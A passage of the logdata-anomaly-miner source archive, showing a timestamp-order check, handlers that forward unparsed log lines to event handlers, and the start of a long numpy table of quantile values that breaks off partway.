the caller may decide if it makes sense passing the parsed atom also to other handlers. 
""" self.log_total += 1 if log_atom.get_timestamp() is None: return False if log_atom.get_timestamp() < self.last_timestamp: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [original_log_line_prefix + data] analysis_component = {"LastTimestamp": self.last_timestamp} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event( f"Analysis.{self.__class__.__name__}", f"Timestamp {datetime.fromtimestamp(log_atom.get_timestamp()).strftime('%Y-%m-%d %H:%M:%S')} below " f"{datetime.fromtimestamp(self.last_timestamp).strftime('%Y-%m-%d %H:%M:%S')}", sorted_log_lines, event_data, log_atom, self) if self.exit_on_error_flag: import sys sys.exit(1) self.last_timestamp = log_atom.get_timestamp() self.log_success += 1 return True UnparsedAtomHandlers.py000066400000000000000000000067261500476301700354170ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a handler that forwards unparsed atoms to the event handlers. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . 
""" from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.parsing.ModelElementInterface import ModelElementInterface from aminer import AminerConfig from aminer.parsing.MatchContext import DebugMatchContext from aminer.AminerConfig import DEBUG_LOG_NAME import logging class SimpleUnparsedAtomHandler(AtomHandlerInterface): """Handlers of this class will just forward the received unparsed atoms to the registered event handlers.""" def __init__(self, anomaly_event_handlers): """Initialise the Unparsed atom handler. @param anomaly_event_handlers for handling events, e.g., print events to stdout. """ super().__init__(anomaly_event_handlers=anomaly_event_handlers) def receive_atom(self, log_atom): """Receive an unparsed atom to create events for each.""" if log_atom.is_parsed(): return False try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) self.send_event_to_handlers(data, log_atom) return True def send_event_to_handlers(self, data, log_atom): """Send the data to the event handlers.""" event_data = {} for listener in self.anomaly_event_handlers: listener.receive_event("Input.UnparsedAtomHandler", "Unparsed atom received", [data], event_data, log_atom, self) class VerboseUnparsedAtomHandler(SimpleUnparsedAtomHandler): """Handlers of this class will forward received unparsed atoms to the registered event handlers applying the DebugMatchContext.""" def __init__(self, anomaly_event_handlers, parsing_model): """Initialise the Unparsed atom handler. @param anomaly_event_handlers for handling events, e.g., print events to stdout. """ super().__init__(anomaly_event_handlers) if not isinstance(parsing_model, ModelElementInterface): msg = "Only subclasses of ModelElementInterface are allowed for parsing_model." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.parsing_model = parsing_model def send_event_to_handlers(self, data, log_atom): """Send the data to the event handlers.""" match_context = DebugMatchContext(log_atom.raw_data) self.parsing_model.get_match_element("", match_context) debug_info = match_context.get_debug_info() debug_lines = [] for line in debug_info.split("\n"): debug_lines.append(line.strip()) event_data = {"DebugLog": debug_lines} for listener in self.anomaly_event_handlers: listener.receive_event( "Input.VerboseUnparsedAtomHandler", "Unparsed atom received", [debug_info + data], event_data, log_atom, self) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/VTDData.py000066400000000000000000031626201500476301700326410ustar00rootroot00000000000000import numpy as np quantiles = {'spec': np.array([-1.8273443302401238,-1.7593797798616286,-1.709951015949996,-1.6790580385052258,-1.6543436565494094,-1.6296292745935932,-1.6110934881267307,-1.5925577016598689,-1.5740219151930066,-1.561664724215098,-1.5493075332371908,-1.5369503422592823,-1.5245931512813744,-1.512235960303466,-1.5060573648145121,-1.4937001738366036,-1.4875215783476496,-1.4751643873697418,-1.4689857918807874,-1.4628071963918334,-1.4566286009028795,-1.444271409924971,-1.438092814436017,-1.431914218947063,-1.4257356234581091,-1.4195570279691547,-1.4133784324802008,-1.4071998369912468,-1.401021241502293,-1.3948426460133383,-1.3886640505243844,-1.3824854550354304,-1.3763068595464765,-1.373217561801999,-1.370128264057522,-1.363949668568568,-1.357771073079614,-1.35159247759066,-1.3485031798461826,-1.3454138821017056,-1.3392352866127517,-1.3330566911237978,-1.3299673933793208,-1.3268780956348438,-1.3206995001458892,-1.3176102024014122,-1.3145209046569353,-1.3083423091679813,-1.3052530114235044,-1.3021637136790274,-1.295985118190073,-1.292895820445596,-1.289806522701119,-1.2836279272121651,-1.2805386294676881,-1.2774493317232112,-1.274360033978733
5,-1.2712707362342566,-1.2650921407453026,-1.2620028430008257,-1.2589135452563487,-1.2558242475118717,-1.2527349497673947,-1.2496456520229173,-1.2465563542784404,-1.2434670565339634,-1.2403777587894864,-1.2341991633005323,-1.2311098655560553,-1.2280205678115783,-1.2249312700671011,-1.2218419723226241,-1.2187526745781472,-1.2156633768336702,-1.2125740790891932,-1.209484781344716,-1.206395483600239,-1.203306185855762,-1.2002168881112847,-1.1971275903668077,-1.1940382926223307,-1.1909489948778538,-1.1878596971333768,-1.1847703993888996,-1.1827108675592481,-1.1806513357295971,-1.1785918038999457,-1.175502506155469,-1.172413208410992,-1.169323910666515,-1.1662346129220378,-1.1631453151775606,-1.1600560174330836,-1.1569667196886066,-1.1538774219441297,-1.1518178901144782,-1.1497583582848272,-1.1476988264551757,-1.1446095287106988,-1.1415202309662216,-1.1384309332217442,-1.1353416354772672,-1.133282103647616,-1.1312225718179647,-1.1291630399883132,-1.1260737422438363,-1.1229844444993593,-1.120924912669708,-1.1188653808400566,-1.1168058490104051,-1.113716551265928,-1.110627253521451,-1.107537955776974,-1.104448658032497,-1.1023891262028456,-1.1003295943731946,-1.098270062543543,-1.0951807647990661,-1.092091467054589,-1.0900319352249375,-1.087972403395286,-1.0859128715656345,-1.0828235738211576,-1.0797342760766806,-1.0776747442470294,-1.0756152124173781,-1.0735556805877267,-1.0704663828432497,-1.0673770850987725,-1.065317553269121,-1.0632580214394698,-1.0611984896098183,-1.0591389577801669,-1.0570794259505158,-1.0550198941208644,-1.0519305963763874,-1.0488412986319104,-1.046781766802259,-1.0447222349726075,-1.0426627031429563,-1.0395734053984789,-1.036484107654002,-1.0344245758243507,-1.0323650439946994,-1.030305512165048,-1.0282459803353967,-1.0261864485057455,-1.024126916676094,-1.021037618931617,-1.0179483211871398,-1.0158887893574884,-1.0138292575278371,-1.0117697256981857,-1.0097101938685342,-1.0076506620388832,-1.0055911302092317,-1.0025018324647548,-0.9994125347202778
,-0.9973530028906263,-0.995293471060975,-0.9932339392313235,-0.9911744074016722,-0.9891148755720207,-0.9870553437423694,-0.9839660459978924,-0.9808767482534154,-0.978817216423764,-0.9767576845941128,-0.9746981527644615,-0.97263862093481,-0.9705790891051587,-0.9685195572755072,-0.96543025953103,-0.962340961786553,-0.9602814299569016,-0.9582218981272504,-0.9561623662975991,-0.9541028344679476,-0.9520433026382965,-0.9499837708086452,-0.9468944730641682,-0.9438051753196909,-0.9417456434900395,-0.9396861116603881,-0.9376265798307367,-0.9355670480010853,-0.9335075161714341,-0.9314479843417828,-0.9283586865973058,-0.9252693888528288,-0.9232098570231774,-0.921150325193526,-0.9190907933638746,-0.9170312615342232,-0.9149717297045717,-0.9129121978749204,-0.9098229001304434,-0.9067336023859665,-0.904674070556315,-0.9026145387266639,-0.9005550068970124,-0.898495475067361,-0.8964359432377096,-0.8943764114080582,-0.891287113663581,-0.888197815919104,-0.8861382840894528,-0.8840787522598015,-0.8820192204301504,-0.878929922685673,-0.8758406249411961,-0.8737810931115447,-0.8717215612818936,-0.8696620294522421,-0.8676024976225908,-0.8655429657929393,-0.863483433963288,-0.860394136218811,-0.857304838474334,-0.8552453066446826,-0.8531857748150312,-0.8511262429853798,-0.8490667111557284,-0.8470071793260773,-0.8449476474964258,-0.8418583497519488,-0.8387690520074716,-0.8367095201778202,-0.8346499883481691,-0.8325904565185177,-0.8305309246888662,-0.8284713928592149,-0.8264118610295634,-0.8233225632850865,-0.8202332655406095,-0.8181737337109581,-0.8161142018813067,-0.8140546700516553,-0.8119951382220039,-0.8099356063923527,-0.8078760745627014,-0.8047867768182241,-0.8016974790737471,-0.7996379472440958,-0.7975784154144446,-0.7955188835847932,-0.7934593517551418,-0.7913998199254904,-0.789340288095839,-0.786250990351362,-0.7831616926068851,-0.7811021607772336,-0.7790426289475822,-0.7769830971179308,-0.7749235652882794,-0.7728640334586283,-0.7708045016289768,-0.7677152038844999,-0.76462590614002
27,-0.7625663743103712,-0.7605068424807201,-0.7584473106510687,-0.7553580129065914,-0.7522687151621145,-0.7502091833324631,-0.748149651502812,-0.7460901196731605,-0.7440305878435092,-0.7419710560138577,-0.7399115241842064,-0.7368222264397294,-0.7337329286952524,-0.731673396865601,-0.7296138650359496,-0.7275543332062981,-0.7254948013766468,-0.7234352695469957,-0.7213757377173442,-0.7182864399728672,-0.71519714222839,-0.7131376103987386,-0.7110780785690874,-0.7090185467394361,-0.7069590149097846,-0.7048994830801333,-0.7028399512504818,-0.6997506535060048,-0.6966613557615279,-0.6946018239318765,-0.6925422921022254,-0.6904827602725739,-0.687393462528097,-0.6843041647836198,-0.6822446329539683,-0.6801851011243172,-0.6781255692946658,-0.6760660374650144,-0.674006505635363,-0.6719469738057116,-0.6688576760612346,-0.6657683783167576,-0.6637088464871063,-0.6616493146574548,-0.6595897828278035,-0.6565004850833265,-0.6534111873388495,-0.651351655509198,-0.6492921236795467,-0.6472325918498952,-0.645173060020244,-0.6431135281905925,-0.6410539963609413,-0.6379646986164642,-0.6348754008719871,-0.6328158690423358,-0.6307563372126844,-0.6286968053830332,-0.625607507638556,-0.6225182098940789,-0.6204586780644277,-0.6183991462347762,-0.616339614405125,-0.6142800825754736,-0.6122205507458222,-0.6101610189161708,-0.6070717211716938,-0.6039824234272169,-0.6019228915975654,-0.599863359767914,-0.5978038279382626,-0.5947145301937856,-0.5916252324493086,-0.5895657006196572,-0.5875061687900058,-0.5854466369603544,-0.5833871051307031,-0.5813275733010518,-0.5792680414714004,-0.5761787437269233,-0.5730894459824463,-0.571029914152795,-0.5689703823231436,-0.5669108504934923,-0.5638215527490152,-0.560732255004538,-0.5586727231748868,-0.5566131913452355,-0.5545536595155841,-0.551464361771107,-0.5483750640266299,-0.5463155321969787,-0.5442560003673272,-0.542196468537676,-0.5401369367080245,-0.5380774048783732,-0.5360178730487217,-0.5329285753042448,-0.5298392775597678,-0.5277797457301164,-0.525720213
900465,-0.5236606820708136,-0.5205713843263367,-0.5174820865818597,-0.5154225547522082,-0.5133630229225569,-0.5113034910929054,-0.5082141933484284,-0.5051248956039515,-0.5030653637743001,-0.5010058319446486,-0.4989463001149973,-0.49585700237052033,-0.49276770462604347,-0.49070817279639206,-0.4886486409667408,-0.4865891091370894,-0.48349981139261244,-0.4804105136481353,-0.4783509818184839,-0.47629144998883266,-0.47423191815918125,-0.47217238632952985,-0.47011285449987855,-0.46805332267022715,-0.46496402492575006,-0.4618747271812731,-0.4598151953516217,-0.4577556635219704,-0.455696131692319,-0.4526068339478419,-0.44951753620336493,-0.4474580043737135,-0.44539847254406223,-0.4433389407144108,-0.4402496429699337,-0.4371603452254567,-0.4351008133958053,-0.43304128156615407,-0.43098174973650266,-0.4278924519920255,-0.42480315424754855,-0.42274362241789715,-0.4206840905882459,-0.4186245587585945,-0.41553526101411736,-0.4124459632696404,-0.410386431439989,-0.40832689961033775,-0.40626736778068634,-0.4031780700362092,-0.40008877229173223,-0.3980292404620808,-0.3959697086324296,-0.3939101768027782,-0.39082087905830104,-0.38773158131382407,-0.38567204948417266,-0.3836125176545214,-0.38155298582487,-0.3784636880803929,-0.3753743903359159,-0.37228509259143894,-0.36919579484696186,-0.36713626301731045,-0.36507673118765915,-0.36301719935800775,-0.3599279016135308,-0.3568386038690537,-0.3547790720394023,-0.352719540209751,-0.3506600083800996,-0.3475707106356226,-0.34448141289114553,-0.3424218810614941,-0.34036234923184283,-0.3383028174021914,-0.33521351965771445,-0.33212422191323737,-0.33006469008358597,-0.32800515825393467,-0.32594562642428326,-0.3228563286798063,-0.3197670309353292,-0.3177074991056778,-0.3156479672760265,-0.3135884354463751,-0.31049913770189813,-0.30740983995742105,-0.3043205422129441,-0.3012312444684671,-0.2991717126388157,-0.2971121808091644,-0.295052648979513,-0.29196335123503603,-0.2888740534905589,-0.2868145216609075,-0.28475498983125624,-0.28269545800160484
,-0.27960616025712787,-0.27651686251265073,-0.27342756476817365,-0.2703382670236967,-0.26827873519404527,-0.266219203364394,-0.26415967153474257,-0.2610703737902655,-0.2579810760457885,-0.2559215442161371,-0.2538620123864858,-0.2518024805568344,-0.24871318281235733,-0.24562388506788035,-0.24253458732340338,-0.23944528957892627,-0.23738575774927487,-0.2353262259196236,-0.2332666940899722,-0.23017739634549522,-0.2270880986010181,-0.223998800856541,-0.22090950311206403,-0.21884997128241263,-0.21679043945276136,-0.21473090762310995,-0.21164160987863284,-0.20855231213415587,-0.20649278030450446,-0.20443324847485317,-0.20237371664520176,-0.19928441890072465,-0.19619512115624768,-0.1931058234117707,-0.1900165256672936,-0.1879569938376422,-0.18589746200799093,-0.18383793017833952,-0.18074863243386255,-0.17765933468938544,-0.17457003694490833,-0.17148073920043136,-0.16942120737077995,-0.16736167554112868,-0.16530214371147728,-0.1622128459670003,-0.15912354822252334,-0.15603425047804623,-0.15294495273356926,-0.15088542090391785,-0.14882588907426658,-0.14676635724461518,-0.14367705950013807,-0.1405877617556611,-0.13749846401118412,-0.13440916626670701,-0.1313198685222299,-0.12823057077775293,-0.12617103894810153,-0.12411150711845026,-0.12205197528879885,-0.11896267754432174,-0.11587337979984477,-0.1127840820553678,-0.10969478431089069,-0.10763525248123929,-0.10557572065158802,-0.10351618882193661,-0.10042689107745964,-0.09733759333298253,-0.09424829558850542,-0.09115899784402844,-0.08806970009955147,-0.08498040235507436,-0.08292087052542295,-0.08086133869577168,-0.07880180686612027,-0.0757125091216433,-0.0726232113771662,-0.06953391363268908,-0.06644461588821211,-0.06335531814373514,-0.06026602039925803,-0.058206488569606626,-0.05614695673995536,-0.05408742491030395,-0.05099812716582691,-0.04790882942134987,-0.04481953167687283,-0.04173023393239579,-0.03864093618791875,-0.03555163844344171,-0.03246234069896467,-0.029373042954487626,-0.02731351112483629,-0.025253979295184883,-0
.023194447465533546,-0.020105149721056502,-0.01701585197657946,-0.013926554232102421,-0.010837256487625381,-0.00774795874314834,-0.0046586609986712995,-0.0015693632541942586,0.0015199344902827824,0.00357946631993412,0.005638998149585526,0.007698529979236864,0.010787827723713905,0.013877125468190945,0.016966423212667985,0.020055720957145026,0.02314501870162207,0.02623431644609911,0.02932361419057615,0.03241291193505319,0.03550220967953016,0.03859150742400713,0.04168080516848417,0.04477010291296122,0.04682963474261256,0.04888916657226396,0.0509486984019153,0.05403799614639234,0.05712729389086938,0.06021659163534642,0.06330588937982347,0.06639518712430051,0.06948448486877755,0.07257378261325459,0.07566308035773163,0.07875237810220867,0.08184167584668571,0.08493097359116275,0.08802027133563979,0.09110956908011683,0.09419886682459387,0.09625839865424521,0.09831793048389662,0.10037746231354795,0.10346676005802499,0.10655605780250203,0.10964535554697907,0.11273465329145611,0.11582395103593315,0.1189132487804102,0.12200254652488723,0.1250918442693643,0.12818114201384126,0.13127043975831829,0.13435973750279534,0.13744903524727237,0.14053833299174942,0.14362763073622645,0.1467169284807035,0.14980622622518053,0.15289552396965758,0.1559848217141346,0.15907411945861166,0.1621634172030887,0.16525271494756574,0.16834201269204277,0.17143131043651982,0.17452060818099685,0.1776099059254739,0.18069920366995093,0.18378850141442798,0.18687779915890504,0.18996709690338207,0.19305639464785912,0.19614569239233615,0.1992349901368132,0.20232428788129023,0.2054135856257672,0.20850288337024425,0.21159218111472128,0.21468147885919833,0.21777077660367536,0.2208600743481524,0.22394937209262944,0.2270386698371065,0.23012796758158352,0.23321726532606057,0.2363065630705376,0.23939586081501465,0.24248515855949168,0.24557445630396874,0.24866375404844576,0.2517530517929228,0.25484234953739987,0.2579316472818769,0.2610209450263539,0.264110242770831,0.26719954051530803,0.27028883825978506,0.2733781360042
621,0.27646743374873917,0.2795567314932162,0.2826460292376932,0.28573532698217025,0.29191392247112435,0.2950032202156014,0.2980925179600784,0.30118181570455543,0.30427111344903246,0.3073604111935095,0.3104497089379865,0.31353900668246354,0.3166283044269406,0.31971760217141765,0.3228068999158947,0.3258961976603717,0.3289854954048488,0.3320747931493258,0.33516409089380284,0.34134268638275694,0.34443198412723397,0.34752128187171094,0.3506105796161881,0.35369987736066505,0.35678917510514213,0.3598784728496191,0.36296777059409624,0.3660570683385732,0.3691463660830503,0.37223566382752726,0.37841425931648137,0.3815035570609584,0.3845928548054354,0.38768215254991245,0.39077145029438953,0.39386074803886656,0.3969500457833436,0.4000393435278206,0.4031286412722977,0.40930723676125175,0.4123965345057288,0.41548583225020586,0.4185751299946829,0.4216644277391599,0.424753725483637,0.427843023228114,0.43402161871706807,0.43711091646154504,0.4402002142060222,0.44328951195049915,0.44637880969497623,0.4494681074394532,0.45255740518393034,0.45873600067288434,0.46182529841736136,0.46491459616183844,0.46800389390631547,0.4710931916507925,0.4741824893952695,0.4772717871397466,0.48345038262870066,0.4865396803731777,0.48962897811765477,0.4927182758621318,0.4958075736066088,0.5019861690955629,0.50507546684004,0.508164764584517,0.5112540623289941,0.514343360073471,0.5205219555624251,0.5236112533069022,0.5267005510513791,0.5297898487958562,0.5328791465403333,0.5390577420292874,0.5421470397737643,0.5452363375182414,0.5483256352627185,0.5514149330071955,0.5575935284961496,0.5606828262406266,0.5637721239851037,0.5668614217295807,0.5699507194740577,0.5761293149630118,0.5792186127074889,0.582307910451966,0.58848650594092,0.5915758036853971,0.594665101429874,0.5977543991743511,0.6008436969188281,0.6070222924077823,0.6101115901522592,0.6132008878967362,0.6193794833856904,0.6224687811301673,0.6255580788746444,0.6317366743635986,0.6348259721080756,0.6379152698525525,0.6440938653415067,0.647183163085983
7,0.6502724608304606,0.6533617585749378,0.6564510563194148,0.6626296518083689,0.6657189495528459,0.6688082472973229,0.674986842786277,0.6780761405307542,0.6811654382752311,0.6873440337641852,0.6904333315086623,0.6935226292531392,0.6997012247420933,0.7058798202310475,0.7089691179755245,0.7120584157200015,0.7182370112089556,0.7213263089534326,0.7244156066979096,0.7305942021868638,0.7336834999313409,0.7367727976758178,0.7429513931647719,0.746040690909249,0.7491299886537259,0.7553085841426801,0.7614871796316341,0.7645764773761111,0.7676657751205882,0.7738443706095423,0.7769336683540192,0.7800229660984964,0.7862015615874505,0.7923801570764044,0.7954694548208815,0.7985587525653586,0.8047373480543126,0.8078266457987897,0.8109159435432668,0.8170945390322207,0.823273134521175,0.826362432265652,0.829451730010129,0.835630325499083,0.8418089209880371,0.844898218732514,0.8479875164769911,0.8541661119659453,0.8603447074548993,0.8634340051993764,0.8665233029438534,0.8727018984328074,0.8788804939217616,0.8850590894107156,0.8881483871551927,0.8912376848996697,0.8974162803886238,0.9035948758775779,0.9066841736220549,0.909773471366532,0.915952066855486,0.9221306623444401,0.9283092578333942,0.9313985555778712,0.9344878533223482,0.9406664488113023,0.9468450443002563,0.9530236397892106,0.9561129375336875,0.9592022352781645,0.9653808307671187,0.9715594262560726,0.9777380217450269,0.9839166172339808,0.9870059149784579,0.990095212722935,0.9962738082118889,1.002452403700843,1.008630999189797,1.0148095946787512,1.0209881901677054,1.0271667856566593,1.0302560834011365,1.0333453811456135,1.0395239766345676,1.0457025721235216,1.0518811676124757,1.0580597631014297,1.0642383585903838,1.070416954079338,1.076595549568292,1.0796848473127691,1.0827741450572461,1.0889527405462003,1.0951313360351542,1.1013099315241082,1.1074885270130623,1.1136671225020165,1.1198457179909704,1.1260243134799246,1.1322029089688785,1.1383815044578327,1.1445600999467869,1.1507386954357408,1.156917290924695,1.1630958864136491
,1.169274481902603,1.1754530773915572,1.1816316728805112,1.1878102683694653,1.1939888638584195,1.2001674593473735,1.2063460548363276,1.2125246503252818,1.2187032458142357,1.2248818413031899,1.2310604367921438,1.237239032281098,1.243417627770052,1.249596223259006,1.2557748187479605,1.2619534142369144,1.2681320097258684,1.2743106052148225,1.2804892007037767,1.2866677961927306,1.2990249871706385,1.3052035826595927,1.311382178148547,1.317560773637501,1.323739369126455,1.3299179646154091,1.3360965601043633,1.3484537510822712,1.3546323465712253,1.3608109420601797,1.3669895375491337,1.3731681330380876,1.3793467285270418,1.3917039195049499,1.3978825149939038,1.404061110482858,1.4102397059718124,1.4225968969497202,1.4287754924386744,1.4349540879276284,1.4411326834165825,1.4534898743944904,1.4596684698834448,1.465847065372399,1.4782042563503068,1.484382851839261,1.4905614473282152,1.502918638306123,1.5090972337950774,1.5152758292840316,1.5276330202619395,1.5338116157508936,1.5461688067288017,1.5523474022177557,1.5647045931956642,1.5708831886846182,1.5832403796625263,1.5894189751514805,1.6017761661293883,1.6079547616183427,1.6203119525962508,1.6264905480852048,1.6388477390631127,1.645026334552067,1.657383525529975,1.6697407165078835,1.6759193119968374,1.6882765029747453,1.6944550984636997,1.7068122894416076,1.7191694804195161,1.731526671397424,1.737705266886378,1.7500624578642865,1.7624196488421944,1.7747768398201027,1.7871340307980106,1.7994912217759191,1.805669817264873,1.8180270082427814,1.8303841992206893,1.8427413901985972,1.8550985811765057,1.8674557721544136,1.879812963132322,1.8983487495991844,1.9107059405770923,1.9230631315550006,1.9354203225329085,1.947777513510817,1.966313299977679,1.9786704909555872,1.991027681933495,2.0095634684003576,2.0219206593782655,2.0404564458451278,2.052813636823036,2.071349423289898,2.0898852097567606,2.102242400734669,2.1207781872015308,2.139313973668393,2.1578497601352553,2.176385546602118,2.19492133306898,2.213457119535842,2.23199290600
27044,2.2567072879585206,2.2752430744253833,2.293778860892245,2.3184932428480614,2.3432076248038776,2.3679220067596938,2.3926363887155104,2.4173507706713266,2.442065152627143,2.4729581300719135,2.4976725120277297,2.5285654894725,2.55945846691727,2.590351444362041,2.627423017295765,2.66449459022949,2.701566163163214,2.744816331585892,2.788066500008571,2.8374952639202036,2.8869240278318364,2.942531387232423,3.004317342121964,3.072281892500459,3.1464250383679073,3.2391039707022187,3.344140094014438,3.473890599282474,3.646891272973188]), 'betam1': np.array([0.0,0.00025,0.0005,0.00075,0.001,0.0012000000000000001,0.0014,0.0015999999999999999,0.0018,0.002,0.0022,0.0024000000000000002,0.0026,0.0028,0.003,0.0032,0.0034000000000000002,0.0036,0.0038,0.004,0.0042,0.0044,0.0046,0.0048000000000000004,0.005,0.0052,0.0054,0.0056,0.0058000000000000005,0.006,0.0062,0.0064,0.0066,0.0068000000000000005,0.007,0.0072,0.0074,0.0076,0.0078000000000000005,0.008,0.0082,0.0084,0.0086,0.008799999999999999,0.009,0.00925,0.0095,0.00975,0.01,0.0102,0.0104,0.0106,0.010799999999999999,0.011,0.0112,0.0114,0.0116,0.0118,0.012,0.0122,0.0124,0.0126,0.012799999999999999,0.013,0.0132,0.0134,0.0136,0.0138,0.014,0.01425,0.014499999999999999,0.01475,0.015,0.0152,0.0154,0.0156,0.0158,0.016,0.0162,0.0164,0.0166,0.016800000000000002,0.017,0.01725,0.0175,0.01775,0.018,0.018199999999999997,0.0184,0.0186,0.0188,0.019,0.0192,0.0194,0.0196,0.0198,0.02,0.02025,0.0205,0.02075,0.021,0.0212,0.0214,0.0216,0.0218,0.022,0.02225,0.0225,0.02275,0.023,0.0232,0.0234,0.0236,0.0238,0.024,0.02425,0.0245,0.02475,0.025,0.0252,0.0254,0.0256,0.0258,0.026,0.02625,0.0265,0.02675,0.027,0.0272,0.0274,0.0276,0.027800000000000002,0.028,0.02825,0.0285,0.02875,0.029,0.0292,0.0294,0.0296,0.0298,0.03,0.03025,0.0305,0.03075,0.031,0.0312,0.0314,0.0316,0.0318,0.032,0.03225,0.0325,0.03275,0.033,0.03325,0.0335,0.03375,0.034,0.0342,0.0344,0.034600000000000006,0.034800000000000005,0.035,0.035250000000000004,0.035500000000000004,0.03575,0.036,0.03625
,0.0365,0.03675,0.037,0.0372,0.037399999999999996,0.0376,0.0378,0.038,0.03825,0.0385,0.03875,0.039,0.03925,0.0395,0.03975,0.04,0.04025,0.0405,0.04075,0.041,0.04125,0.0415,0.04175,0.042,0.0422,0.0424,0.0426,0.0428,0.043,0.04325,0.0435,0.04375,0.044,0.04425,0.0445,0.04475,0.045,0.04525,0.0455,0.04575,0.046,0.04625,0.0465,0.04675,0.047,0.04725,0.0475,0.04775,0.048,0.0482,0.0484,0.048600000000000004,0.0488,0.049,0.04925,0.0495,0.04975,0.05,0.05025,0.0505,0.050749999999999997,0.051,0.05125,0.0515,0.05175,0.052,0.05225,0.0525,0.05275,0.053,0.05325,0.0535,0.05375,0.054,0.05425,0.0545,0.05475,0.055,0.05525,0.0555,0.05575,0.056,0.05625,0.0565,0.05675,0.057,0.05725,0.0575,0.05775,0.058,0.05825,0.058499999999999996,0.05875,0.059,0.05933333333333333,0.059666666666666666,0.06,0.06025,0.0605,0.06075,0.061,0.06125,0.0615,0.06175,0.062,0.06225,0.0625,0.06275,0.063,0.06325,0.0635,0.06375,0.064,0.06425,0.0645,0.06475,0.065,0.06525,0.0655,0.06575,0.066,0.06633333333333334,0.06666666666666667,0.067,0.06725,0.0675,0.06775,0.068,0.06825,0.0685,0.06875,0.069,0.06925,0.0695,0.06975,0.07,0.07033333333333333,0.07066666666666667,0.071,0.07125,0.0715,0.07175,0.072,0.07225,0.0725,0.07275,0.073,0.07325,0.0735,0.07375,0.074,0.07433333333333333,0.07466666666666666,0.075,0.07525,0.0755,0.07575,0.076,0.07633333333333334,0.07666666666666666,0.077,0.07725,0.0775,0.07775,0.078,0.07825,0.0785,0.07875,0.079,0.07933333333333334,0.07966666666666666,0.08,0.08025,0.0805,0.08075,0.081,0.08133333333333334,0.08166666666666667,0.082,0.08225,0.0825,0.08275,0.083,0.08333333333333334,0.08366666666666667,0.084,0.08425,0.0845,0.08475,0.085,0.08533333333333333,0.08566666666666667,0.086,0.08625,0.0865,0.08675,0.087,0.08733333333333333,0.08766666666666666,0.088,0.08825,0.0885,0.08875,0.089,0.08933333333333333,0.08966666666666666,0.09,0.09025,0.0905,0.09075,0.091,0.09133333333333334,0.09166666666666666,0.092,0.09225,0.0925,0.09275,0.093,0.09333333333333334,0.09366666666666666,0.094,0.09433333333333334,0.09466666666666666
,0.095,0.09525,0.0955,0.09575,0.096,0.09633333333333334,0.09666666666666666,0.097,0.09733333333333334,0.09766666666666667,0.098,0.09825,0.0985,0.09875,0.099,0.09933333333333334,0.09966666666666667,0.1,0.10033333333333334,0.10066666666666667,0.101,0.10133333333333333,0.10166666666666667,0.102,0.10225,0.1025,0.10275,0.103,0.10333333333333333,0.10366666666666666,0.104,0.10433333333333333,0.10466666666666666,0.105,0.10533333333333333,0.10566666666666666,0.106,0.10633333333333334,0.10666666666666666,0.107,0.10725,0.1075,0.10775,0.108,0.10833333333333334,0.10866666666666666,0.109,0.10933333333333334,0.10966666666666666,0.11,0.11033333333333334,0.11066666666666666,0.111,0.11133333333333334,0.11166666666666666,0.112,0.11233333333333334,0.11266666666666666,0.113,0.11333333333333334,0.11366666666666667,0.114,0.11433333333333334,0.11466666666666667,0.115,0.11533333333333334,0.11566666666666667,0.116,0.11625,0.1165,0.11675,0.117,0.11733333333333333,0.11766666666666667,0.118,0.11833333333333333,0.11866666666666666,0.119,0.11933333333333333,0.11966666666666666,0.12,0.12033333333333333,0.12066666666666666,0.121,0.12133333333333333,0.12166666666666666,0.122,0.12233333333333334,0.12266666666666666,0.123,0.1235,0.124,0.12433333333333334,0.12466666666666666,0.125,0.12533333333333332,0.12566666666666668,0.126,0.12633333333333333,0.12666666666666668,0.127,0.12733333333333333,0.12766666666666668,0.128,0.12833333333333333,0.12866666666666668,0.129,0.12933333333333333,0.12966666666666668,0.13,0.13033333333333333,0.13066666666666668,0.131,0.13133333333333333,0.13166666666666668,0.132,0.1325,0.133,0.13333333333333333,0.13366666666666668,0.134,0.13433333333333333,0.13466666666666668,0.135,0.13533333333333333,0.13566666666666669,0.136,0.13633333333333333,0.1366666666666667,0.137,0.1375,0.138,0.13833333333333334,0.1386666666666667,0.139,0.13933333333333334,0.1396666666666667,0.14,0.14033333333333334,0.14066666666666666,0.141,0.1415,0.142,0.1423333333333333,0.14266666666666666,0.143,0.1433333333
333333,0.14366666666666666,0.144,0.1445,0.145,0.14533333333333331,0.14566666666666667,0.146,0.14633333333333332,0.14666666666666667,0.147,0.1475,0.148,0.14833333333333332,0.14866666666666667,0.149,0.14933333333333332,0.14966666666666667,0.15,0.1505,0.151,0.15133333333333332,0.15166666666666667,0.152,0.1525,0.153,0.15333333333333332,0.15366666666666667,0.154,0.1545,0.155,0.15533333333333332,0.15566666666666668,0.156,0.15633333333333332,0.15666666666666668,0.157,0.1575,0.158,0.15833333333333333,0.15866666666666668,0.159,0.1595,0.16,0.16033333333333333,0.16066666666666668,0.161,0.1615,0.162,0.16233333333333333,0.16266666666666668,0.163,0.1635,0.164,0.1645,0.165,0.16533333333333333,0.16566666666666668,0.166,0.1665,0.167,0.16733333333333333,0.16766666666666669,0.168,0.1685,0.169,0.1695,0.17,0.17033333333333334,0.1706666666666667,0.171,0.17149999999999999,0.172,0.1725,0.173,0.1733333333333333,0.17366666666666666,0.174,0.1745,0.175,0.1755,0.176,0.17633333333333331,0.17666666666666667,0.177,0.1775,0.178,0.